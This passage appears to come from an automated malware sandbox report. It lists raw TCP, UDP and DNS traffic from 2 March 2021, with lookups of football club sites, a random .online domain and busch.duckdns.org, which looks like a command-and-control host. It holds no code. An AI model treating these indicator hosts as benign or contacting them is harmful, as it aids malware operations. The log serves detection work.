                                                                                                                                                                                        Mar 2, 2021 20:41:07.293967962 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.293992996 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.295155048 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.295181990 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.295249939 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.295263052 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.296415091 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.296447039 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.296540976 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.297597885 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.297624111 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.297739029 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.298798084 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.298824072 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.298928976 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.300014973 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.300028086 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.300143003 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.301206112 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.301232100 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.301291943 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.302401066 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.302426100 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.302555084 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.303634882 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.303659916 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.303837061 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.304815054 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.304836988 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.305419922 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.306046009 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.306066990 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.306127071 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.307238102 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.307260990 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.307612896 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.308527946 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.308553934 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.308856010 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.309628010 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.309652090 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.309901953 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.310870886 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.310895920 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.312066078 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.312088966 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.312182903 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.312202930 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.313278913 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.313411951 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.313888073 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.314449072 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.314474106 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.314543009 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.315669060 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.315690041 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.316678047 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.331288099 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.331320047 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.331634998 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.331657887 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.331681013 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.332791090 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.333067894 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.333091021 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.333169937 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.333672047 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.333698034 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.334222078 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.334842920 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.334866047 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.335447073 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.337181091 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.337203026 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.337410927 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.337588072 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.337611914 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.338629007 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.338651896 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.339340925 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.339695930 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.339719057 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.340029001 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.340986013 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.341012955 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.341433048 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.342406034 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.342433929 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.343311071 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.343332052 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.343427896 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.343458891 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.344517946 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.344537020 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.345428944 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.345813990 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.345834970 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.346113920 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.347366095 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.347385883 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.347450018 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.348057985 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.348073006 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.348181963 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.349546909 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.349844933 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.350003958 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.350913048 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.350944042 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.351079941 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.351845026 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.351883888 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.352010965 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354114056 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354149103 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354363918 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354532003 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354559898 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354700089 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.355784893 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.355815887 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.355974913 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.356442928 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.356470108 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.357697964 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.358639956 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.358669043 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.358773947 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.373822927 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.373859882 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.373878956 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.373925924 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.374658108 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.374674082 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.374730110 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376193047 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376229048 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376252890 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376395941 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376409054 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.378366947 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.378402948 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.378431082 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.378556013 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381320953 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381355047 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381378889 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381424904 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381552935 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381908894 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381937027 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381961107 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.382009029 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383344889 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383378983 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383394003 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383456945 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383469105 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.439899921 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:18.752147913 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:18.752886057 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:18.753184080 CET4973180192.168.2.699.86.159.103

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Mar 2, 2021 20:40:51.223503113 CET6426753192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:40:51.269520044 CET53642678.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:40:51.411192894 CET4944853192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:40:51.463581085 CET53494488.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:40:53.302298069 CET6034253192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:40:53.348253012 CET53603428.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:40:54.314325094 CET6134653192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:40:54.362881899 CET53613468.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:40:55.528903961 CET5177453192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:40:55.577717066 CET53517748.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:40:56.896214962 CET5602353192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:40:56.944917917 CET53560238.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:40:57.846688032 CET5838453192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:40:57.893986940 CET53583848.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:40:59.375477076 CET6026153192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:40:59.421421051 CET53602618.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:00.146970987 CET5606153192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:00.195576906 CET53560618.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:00.700767040 CET5833653192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:00.746674061 CET53583368.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:00.800980091 CET5378153192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:00.859214067 CET53537818.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:00.866863012 CET5406453192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:00.926645041 CET53540648.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.038665056 CET5281153192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:01.093194008 CET53528118.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.100135088 CET5529953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:01.157641888 CET53552998.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.284337044 CET6374553192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:01.352133989 CET53637458.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.359931946 CET5005553192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:01.407466888 CET53500558.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.508059978 CET6137453192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:01.554646015 CET53613748.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.567615986 CET5033953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:01.634470940 CET53503398.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.871817112 CET6330753192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:01.918708086 CET53633078.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:03.109509945 CET4969453192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:03.155142069 CET53496948.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:04.233232021 CET5498253192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:04.284529924 CET53549828.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.028606892 CET5001053192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:05.035135031 CET6371853192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:05.076627016 CET53500108.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.084932089 CET53637188.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.085417986 CET6211653192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:05.131516933 CET53621168.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.243597984 CET6381653192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:05.305687904 CET53638168.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.314006090 CET5501453192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:05.360922098 CET53550148.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.462596893 CET6220853192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:05.520545959 CET53622088.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.972187996 CET5757453192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:06.020853996 CET53575748.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.159061909 CET5181853192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:06.218075037 CET53518188.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.225415945 CET5662853192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:06.297781944 CET53566288.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.392410994 CET6077853192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:06.452909946 CET53607788.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.458776951 CET5379953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:06.511295080 CET53537998.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.760833025 CET5468353192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:06.809514999 CET53546838.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.458220959 CET5932953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.513892889 CET53593298.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.522399902 CET6402153192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.576818943 CET53640218.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.687927008 CET5612953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.731081963 CET5817753192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.746239901 CET53561298.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.754391909 CET5070053192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.776822090 CET53581778.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.812843084 CET53507008.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:08.897471905 CET5406953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:08.954718113 CET53540698.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:09.657754898 CET6117853192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:09.706419945 CET53611788.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:18.315679073 CET5701753192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:18.539558887 CET53570178.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:18.559680939 CET5632753192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:18.608015060 CET53563278.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:24.440776110 CET5024353192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:24.489442110 CET53502438.8.8.8192.168.2.6

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                        Mar 2, 2021 20:41:00.800980091 CET192.168.2.68.8.8.80x3c17Standard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.866863012 CET192.168.2.68.8.8.80x2276Standard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.038665056 CET192.168.2.68.8.8.80x1005Standard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.100135088 CET192.168.2.68.8.8.80x7beStandard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.284337044 CET192.168.2.68.8.8.80x6414Standard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.359931946 CET192.168.2.68.8.8.80x753bStandard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.508059978 CET192.168.2.68.8.8.80x1fe6Standard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.567615986 CET192.168.2.68.8.8.80x7281Standard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.028606892 CET192.168.2.68.8.8.80x9d8bStandard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.085417986 CET192.168.2.68.8.8.80x5f9cStandard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.243597984 CET192.168.2.68.8.8.80xa326Standard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.314006090 CET192.168.2.68.8.8.80xbc35Standard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.462596893 CET192.168.2.68.8.8.80x81eeStandard query (0)0k10dk21kkeok2e.onlineA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.159061909 CET192.168.2.68.8.8.80xad70Standard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.225415945 CET192.168.2.68.8.8.80xd783Standard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.392410994 CET192.168.2.68.8.8.80x5af2Standard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.458776951 CET192.168.2.68.8.8.80xaac8Standard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:07.458220959 CET192.168.2.68.8.8.80x119Standard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:07.522399902 CET192.168.2.68.8.8.80xd69bStandard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:07.687927008 CET192.168.2.68.8.8.80x4b7bStandard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:07.754391909 CET192.168.2.68.8.8.80x96e1Standard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:18.315679073 CET192.168.2.68.8.8.80xb58dStandard query (0)busch.duckdns.orgA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:18.559680939 CET192.168.2.68.8.8.80x2cf2Standard query (0)busch.duckdns.orgA (IP address)IN (0x0001)

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                        Mar 2, 2021 20:41:00.859214067 CET8.8.8.8192.168.2.60x3c17No error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
